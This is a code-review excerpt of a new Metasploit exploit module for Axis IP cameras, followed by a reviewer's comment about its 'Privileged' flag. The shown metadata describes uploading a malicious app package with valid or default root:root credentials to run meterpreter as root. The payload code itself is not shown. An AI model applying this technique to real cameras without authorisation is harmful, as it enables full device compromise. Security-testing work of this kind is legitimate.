modules/exploits/linux/http/axis_app_install.rb

```diff
@@ -0,0 +1,254 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Axis IP Camera Application Upload',
+        'Description' => %q{
+          This module exploits the "Apps" feature in Axis IP cameras. The feature allows third party
+          developers to upload and execute 'eap' applications on the device. The system does not validate
+          the application comes from a trusted source, so a malicious attacker can upload and execute
+          arbitrary code. The issue has no CVE, although the technique was made public in 2018.
+
+          This module uploads and executes stageless meterpreter as `root`. Uploading the application
+          requires valid credentials. The default administrator credentials used to be `root:root` but
+          newer firmware versions force users to provide a new password for the `root` user.
+
+          The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021).
+          Although all modules that support this feature are presumed to be vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness'],
+          [ 'URL', 'https://www.axis.com/support/developer-support/axis-camera-application-platform']
+        ],
+        'DisclosureDate' => '2018-04-12',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_ARMLE],
+        'Privileged' => false,
```

Comment:
Would we not consider that to be privileged given this executes code as `root`? 
```suggestion
        'Privileged' => true,
```